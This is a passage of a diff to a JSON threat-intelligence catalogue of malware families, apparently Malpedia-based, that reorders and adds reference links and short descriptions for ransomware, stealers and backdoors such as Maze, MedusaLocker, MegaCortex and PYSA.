"https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://securelist.com/maze-ransomware/99137/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", + "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", + "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", + "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://oag.ca.gov/system/files/Letter%204.pdf", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", + "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", + "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", + "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", "https://news.sophos.com/en-us/2020/09/22/mtr-casebook-blocking-a-15-million-maze-ransomware-attack/", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/", + "https://www.docdroid.net/dUpPY5s/maze.pdf", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://adversary.crowdstrike.com/adversary/twisted-spider/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", - "https://oag.ca.gov/system/files/Letter%204.pdf" + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", + "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat" ], "synonyms": [ "ChaCha" @@ -33020,9 +34573,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", - "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", - "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100" ], "synonyms": [ @@ -33052,8 +34605,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/", - "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", "https://www.symantec.com/connect/blogs/bios-threat-showing-again" ], "synonyms": [ @@ -33069,9 +34622,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mechanical", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" ], "synonyms": [ "GoldStamp" @@ -33099,10 +34652,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", - "https://news.drweb.com/show/?i=10302&lng=en" + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" ], "synonyms": [], "type": [] @@ -33115,34 +34668,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/", - "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", - "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-3-analysing-medusalocker-ransomware/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", "https://asec.ahnlab.com/en/48940/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/", + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-2-analysing-medusalocker-ransomware/", + "https://twitter.com/siri_urz/status/1215194488714346496?s=20", + "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.cybereason.com/blog/medusalocker-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-181a", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", + "https://blog.cyble.com/2023/03/15/unmasking-medusalocker-ransomware/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf", "https://blog.talosintelligence.com/2020/04/medusalocker.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.cybereason.com/blog/medusalocker-ransomware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/", - "https://twitter.com/siri_urz/status/1215194488714346496?s=20" + "https://www.theta.co.nz/news-blogs/cyber-security-blog/part-1-analysing-medusalocker-ransomware/" ], "synonyms": [ "AKO Doxware", @@ -33154,32 +34707,46 @@ "uuid": "77e7221f-d3db-4d13-bcde-e6d7a494f424", "value": "MedusaLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza", + "https://russianpanda.com/2023/06/28/Meduza-Stealer-or-The-Return-of-The-Infamous-Aurora-Stealer/", + "https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "20edd63e-d1a8-4aae-a0a6-50f5bb1cf65f", + "value": "Meduza Stealer" + }, { "description": "Megacortex is a ransomware used in targeted attacks against corporations.\r\nOnce the ransomware is run it tries to stop security related services and after that it starts its own encryption process adding a .aes128ctr or .megac0rtx extension to the encrypted files. It is used to be carried from downloaders and trojans, it has no own propagation capabilities.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex", - "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", - "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", "https://news.sophos.com/en-us/2019/05/10/megacortex-deconstructed-mysteries-mount-as-analysis-continues/", - "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", - "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot", + "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", + "https://blog.malwarebytes.com/detections/ransom-megacortex/", + "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", + "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://www.trendmicro.com/vinfo/pl/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks", - "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.bleepingcomputer.com/news/security/elusive-megacortex-ransomware-found-here-is-what-we-know/", + "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://blog.malwarebytes.com/detections/ransom-megacortex/", - "https://www.bleepingcomputer.com/news/security/bitdefender-releases-free-megacortex-ransomware-decryptor/", - "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/" + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [], "type": [] @@ -33192,8 +34759,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacreep", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] @@ -33206,8 +34773,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/" + "https://fumik0.com/2019/05/03/lets-nuke-megumin-trojan/", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145" ], "synonyms": [], "type": [] @@ -33220,15 +34787,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", + "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/", + "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", "https://twitter.com/hpsecurity/status/1509185858146082816", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/", "https://www.microsoft.com/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/", "https://research.checkpoint.com/2021/mekotio-banker-returns-with-improved-stealth-and-ancient-encryption/", - "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam", - "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", - "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/" + "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf" ], "synonyms": [], "type": [] @@ -33250,7 +34817,7 @@ "value": "Melcoz" }, { - "description": "Ransomware, based on leaked Conti source code.", + "description": "According to PCrisk, MEOW is ransomware based on other ransomware called CONTI. MEOW encrypts files and appends the \".MEOW\" extension to their filenames. It also drops the \"readme.txt\" file (a ransom note). An example of how MEOW ransomware modifies filenames: it renames \"1.jpg\" to \"1.jpg.MEOW\", \"2.png\" to \"2.png.MEOW\", and so forth.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow", @@ -33276,6 +34843,19 @@ "uuid": "5fa45856-2960-47c4-ad73-df0ff142ae12", "value": "MercurialGrabber" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.merdoor", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bf604927-77df-46e5-9bdb-ee9b631461a2", + "value": "Merdoor" + }, { "description": "Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.", "meta": { @@ -33297,37 +34877,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf", - "http://www.secureworks.com/research/threat-profiles/gold-burlap", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://twitter.com/inversecos/status/1456486725664993287", - "https://www.ic3.gov/Media/News/2021/210316.pdf", - "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", - "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://twitter.com/campuscodi/status/1347223969984897026", - "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", - "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat", - "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/", - "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware", + "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://twitter.com/inversecos/status/1456486725664993287", "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.hhs.gov/sites/default/files/mespinoza-goldburlap-cyborgspider-analystnote-tlpwhite.pdf", - "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/" + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", + "https://blog.cyble.com/2021/11/29/pysa-ransomware-under-the-lens-a-deep-dive-analysis/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.ic3.gov/Media/News/2021/210316.pdf", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://twitter.com/campuscodi/status/1347223969984897026", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://unit42.paloaltonetworks.com/gasket-and-magicsocks-tools-install-mespinoza-ransomware/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", + "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ransomware-gangs-script-shows-exactly-the-files-theyre-after/", + "https://www.prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis", + "https://www.prodaft.com/m/reports/PYSA_TLPWHITE_3.0.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.lacework.com/blog/pysa-ransomware-gang-adds-linux-support/" ], "synonyms": [ "pysa" @@ -33357,15 +34937,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metaljack", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html", "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", - "https://www.secrss.com/articles/17900", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.youtube.com/watch?v=ftjDH65kw6E", - "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", + "https://s.tencent.com/research/report/944.html", "https://m.threatbook.cn/detail/2527", - "https://s.tencent.com/research/report/944.html" + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://www.secrss.com/articles/17900" ], "synonyms": [ "denesRAT" @@ -33376,21 +34956,22 @@ "value": "METALJACK" }, { - "description": "", + "description": "According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo", - "https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html", - "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", - "https://twitter.com/MsftSecIntel/status/1418706916922986504", - 